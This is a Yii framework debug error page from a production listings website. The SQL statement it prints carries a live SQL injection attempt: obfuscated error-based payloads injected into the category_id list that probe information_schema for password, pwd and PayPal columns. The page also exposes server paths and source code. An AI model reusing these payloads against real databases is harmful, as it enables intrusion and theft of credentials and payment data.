CDbException

CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'order by 1-- - and 'a'='a','38','39','40','41','659','660','661','662','42','...' at line 1. The SQL statement executed was: SELECT `t`.`id` AS `t0_c0`, `t`.`name` AS `t0_c1`, `t`.`description` AS `t0_c2`, `t`.`content` AS `t0_c3`, `t`.`manufacturer` AS `t0_c4`, `t`.`user_id` AS `t0_c5`, `t`.`module_id` AS `t0_c6`, `t`.`module2_id` AS `t0_c7`, `t`.`module3_id` AS `t0_c8`, `t`.`module4_id` AS `t0_c9`, `t`.`module5_id` AS `t0_c10`, `t`.`listing_id` AS `t0_c11`, `t`.`listing_draft_id` AS `t0_c12`, `t`.`category_id` AS `t0_c13`, `t`.`brand_id` AS `t0_c14`, `t`.`layout_id` AS `t0_c15`, `t`.`product_category_id` AS `t0_c16`, `t`.`category` AS `t0_c17`, `t`.`category_proposition` AS `t0_c18`, `t`.`contact` AS `t0_c19`, `t`.`phone` AS `t0_c20`, `t`.`mobile` AS `t0_c21`, `t`.`fax` AS `t0_c22`, `t`.`email` AS `t0_c23`, `t`.`website` AS `t0_c24`, `t`.`address` AS `t0_c25`, `t`.`address_addition` AS `t0_c26`, `t`.`city_id` AS `t0_c27`, `t`.`map_latitude` AS `t0_c28`, `t`.`map_longitude` AS `t0_c29`, `t`.`price` AS `t0_c30`, `t`.`promotion_price` AS `t0_c31`, `t`.`promotion_reduction` AS `t0_c32`, `t`.`council_price` AS `t0_c33`, `t`.`council_reduction` AS `t0_c34`, `t`.`rates` AS `t0_c35`, `t`.`initial_stock` AS `t0_c36`, `t`.`stock` AS `t0_c37`, `t`.`sell_type_id` AS `t0_c38`, `t`.`tax_id` AS `t0_c39`, `t`.`highlight_id` AS `t0_c40`, `t`.`video_url` AS `t0_c41`, `t`.`podcast_url` AS `t0_c42`, `t`.`buy_url` AS `t0_c43`, `t`.`allowed_images` AS `t0_c44`, `t`.`allowed_videos` AS `t0_c45`, `t`.`rating` AS `t0_c46`, `t`.`rating_count` AS `t0_c47`, `t`.`recommendation` AS `t0_c48`, `t`.`access_count` AS `t0_c49`, `t`.`redirect_count` AS `t0_c50`, `t`.`comment` AS `t0_c51`, `t`.`rank` AS `t0_c52`, `t`.`to_delete` AS `t0_c53`, 
`t`.`has_price_from_label` AS `t0_c54`, `t`.`has_invoice` AS `t0_c55`, `t`.`is_salable` AS `t0_c56`, `t`.`is_product` AS `t0_c57`, `t`.`is_highlight` AS `t0_c58`, `t`.`is_search_highlight` AS `t0_c59`, `t`.`is_promotion` AS `t0_c60`, `t`.`is_council_promotion` AS `t0_c61`, `t`.`is_featured` AS `t0_c62`, `t`.`is_validated` AS `t0_c63`, `t`.`is_indexed` AS `t0_c64`, `t`.`is_active` AS `t0_c65`, `t`.`reference` AS `t0_c66`, `t`.`highlight_end_date` AS `t0_c67`, `t`.`search_highlight_end_date` AS `t0_c68`, `t`.`created_by` AS `t0_c69`, `t`.`created_date` AS `t0_c70`, `t`.`modified_by` AS `t0_c71`, `t`.`modified_date` AS `t0_c72`, `t`.`validity_end_date` AS `t0_c73`, `t`.`sell_end_date` AS `t0_c74`, `t`.`promotion_end_date` AS `t0_c75`, `t`.`promotion_begin_date` AS `t0_c76`, `listing`.`id` AS `t1_c0`, `listing`.`sell_end_date` AS `t1_c1`, `listing`.`code` AS `t1_c2`, `listing`.`name` AS `t1_c3`, `listing`.`short_name` AS `t1_c4`, `listing`.`description` AS `t1_c5`, `listing`.`content` AS `t1_c6`, `listing`.`user_id` AS `t1_c7`, `listing`.`module_id` AS `t1_c8`, `listing`.`module2_id` AS `t1_c9`, `listing`.`module3_id` AS `t1_c10`, `listing`.`module4_id` AS `t1_c11`, `listing`.`module5_id` AS `t1_c12`, `listing`.`category_id` AS `t1_c13`, `listing`.`header_image_id` AS `t1_c14`, `listing`.`layout_id` AS `t1_c15`, `listing`.`listing_draft_id` AS `t1_c16`, `listing`.`listing_category_id` AS `t1_c17`, `listing`.`category_old` AS `t1_c18`, `listing`.`category_proposition` AS `t1_c19`, `listing`.`contact` AS `t1_c20`, `listing`.`phone` AS `t1_c21`, `listing`.`mobile` AS `t1_c22`, `listing`.`fax` AS `t1_c23`, `listing`.`email` AS `t1_c24`, `listing`.`website` AS `t1_c25`, `listing`.`address` AS `t1_c26`, `listing`.`address_addition` AS `t1_c27`, `listing`.`postal_code` AS `t1_c28`, `listing`.`city_id` AS `t1_c29`, `listing`.`map_latitude` AS `t1_c30`, `listing`.`map_longitude` AS `t1_c31`, `listing`.`video_url` AS `t1_c32`, `listing`.`podcast_url` AS `t1_c33`, 
`listing`.`opening_times` AS `t1_c34`, `listing`.`monday_begin` AS `t1_c35`, `listing`.`monday_end` AS `t1_c36`, `listing`.`tuesday_begin` AS `t1_c37`, `listing`.`tuesday_end` AS `t1_c38`, `listing`.`allowed_videos` AS `t1_c39`, `listing`.`rating` AS `t1_c40`, `listing`.`rating_count` AS `t1_c41`, `listing`.`recommendation` AS `t1_c42`, `listing`.`access_count` AS `t1_c43`, `listing`.`comment` AS `t1_c44`, `listing`.`rank` AS `t1_c45`, `listing`.`to_delete` AS `t1_c46`, `listing`.`is_product` AS `t1_c47`, `listing`.`is_highlight` AS `t1_c48`, `listing`.`is_search_highlight` AS `t1_c49`, `listing`.`is_promotion` AS `t1_c50`, `listing`.`is_featured` AS `t1_c51`, `listing`.`is_validated` AS `t1_c52`, `listing`.`is_indexed` AS `t1_c53`, `listing`.`is_active` AS `t1_c54`, `listing`.`reference` AS `t1_c55`, `listing`.`created_by` AS `t1_c56`, `listing`.`created_date` AS `t1_c57`, `listing`.`modified_email` AS `t1_c58`, `listing`.`modified_by` AS `t1_c59`, `listing`.`modified_date` AS `t1_c60`, `listing`.`allowed_images` AS `t1_c61`, `listing`.`wednesday_begin` AS `t1_c62`, `listing`.`wednesday_end` AS `t1_c63`, `listing`.`thursday_begin` AS `t1_c64`, `listing`.`thursday_end` AS `t1_c65`, `listing`.`friday_begin` AS `t1_c66`, `listing`.`friday_end` AS `t1_c67`, `listing`.`saturday_begin` AS `t1_c68`, `listing`.`saturday_end` AS `t1_c69`, `listing`.`sunday_begin` AS `t1_c70`, `listing`.`sunday_end` AS `t1_c71`, `listing`.`highlight_end_date` AS `t1_c72`, `listing`.`highlight_id` AS `t1_c73`, `listing`.`search_highlight_end_date` AS `t1_c74`, `listing`.`sell_type_id` AS `t1_c75` FROM `product` `t` LEFT OUTER JOIN `listing` `listing` ON (`t`.`listing_id`=`listing`.`id`) WHERE ( (t.city_id IN ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','23','24','26','28','29','30','31','32','33','34','35','36','37') OR listing.city_id IN 
('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','23','24','26','28','29','30','31','32','33','34','35','36','37')) AND t.category_id IN ('37' and 1=1 order by 1-- - and 'a'='a','38','39','40','41','659','660','661','662','42','43','44' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x2570617373776f726425 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','45','46','47','48','49','50','51','52','53','54','55','87','88','89','116' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x2570617373776f726425 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and 
'1'='1','117','118','119','120','121','122','123','124','125','126','127','128','129','130','131','132' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,d./**/sChEmA_NaMe,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and c./**/cOlUmN_NaMe like 0x2570776425 and not t./**/tAbLe_nAmE in(0x666b5f636c69656e74,0x666b5f636c69656e745f313032303135,0x666b5f636c69656e745f636f7079,0x666b5f636c69656e745f6e6577,0x746563686e696369656e,0x757365725f6f6c64) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 6,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','133','134','135','136','137','138','139','140','141','142','143','144','145','146','147','148','149','150','151','152','153','154','155','156','157','158','159','160','161','162','163','164','165','166','167','168','169','403' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,d./**/sChEmA_NaMe,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and c./**/cOlUmN_NaMe like 0x2570617970616c25 and not t./**/tAbLe_nAmE in(0x69706e73) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and 
'1'='1','404','405','406','407','408','409') AND t.is_active='1') ORDER BY t.access_count DESC, CASE WHEN (t.price is NOT NULL OR t.price>'0.00') THEN 1 ELSE 2 END,`t`.rank DESC, RAND() LIMIT 15

/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/db/CDbCommand.php(543)

531         {
532             if($this->_connection->enableProfiling)
533                 Yii::endProfile('system.db.CDbCommand.query('.$this->getText().$par.')','system.db.CDbCommand.query');
534 
535             $errorInfo=$e instanceof PDOException ? $e->errorInfo : null;
536             $message=$e->getMessage();
537             Yii::log(Yii::t('yii','CDbCommand::{method}() failed: {error}. The SQL statement executed was: {sql}.',
538                 array('{method}'=>$method, '{error}'=>$message, '{sql}'=>$this->getText().$par)),CLogger::LEVEL_ERROR,'system.db.CDbCommand');
539 
540             if(YII_DEBUG)
541                 $message.='. The SQL statement executed was: '.$this->getText().$par;
542 
543             throw new CDbException(Yii::t('yii','CDbCommand failed to execute the SQL statement: {error}',
544                 array('{error}'=>$message)),(int)$e->getCode(),$errorInfo);
545         }
546     }
547 
548     /**
549      * Builds a SQL SELECT statement from the given query specification.
550      * @param array $query the query specification in name-value pairs. The following
551      * query options are supported: {@link select}, {@link distinct}, {@link from},
552      * {@link where}, {@link join}, {@link group}, {@link having}, {@link order},
553      * {@link limit}, {@link offset} and {@link union}.
554      * @throws CDbException if "from" key is not present in given query parameter
555      * @return string the SQL statement

Stack Trace

#8
 /home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/protected/models/Product.php(730): CDataProvider->getData()
725         $order="t.access_count DESC".($options['order']?",".$options['order']:"");
726         $options['offset']=0;
727         $options['limit']=$limit;
728     
729         $dataProvider=Product::getDataProvider($options,$order,$ignore_search);
730         $array=$dataProvider->getData();
731         
732         shuffle($array);
733                 
734         return $array;
735     }
#9
 /home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/protected/controllers/ProductController.php(699): Product::getMostPopularItems(array("category_id" => null, "module_id" => "38"))
694             $condition=array('category_id'=>isset($model->category->parent)?$model->category->parent_id:$model->category_id);
695             if (!$condition['category_id'])
696                 $condition['module_id']=$module_id;            
697             
698             // Most popular
699             $items=Product::getMostPopularItems($condition);        
700             $sidebarBlocs[]=array(
701                 'name' => AP_BLOC_PATH.'_featured_list',
702                 'title' => Yii::t('app','Populaires'),
703                 'items' => $items,
704             );
#22
 /home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/index.php(58): CApplication->run()
53         // header("Location: http://pro.".AP_DOMAIN_NAME."/".$url);
54         // exit;
55     // }
56 
57 require_once($yii);
58 Yii::createWebApplication($config)->run();
2024-03-18 22:19:17 Apache Yii Framework/1.1.14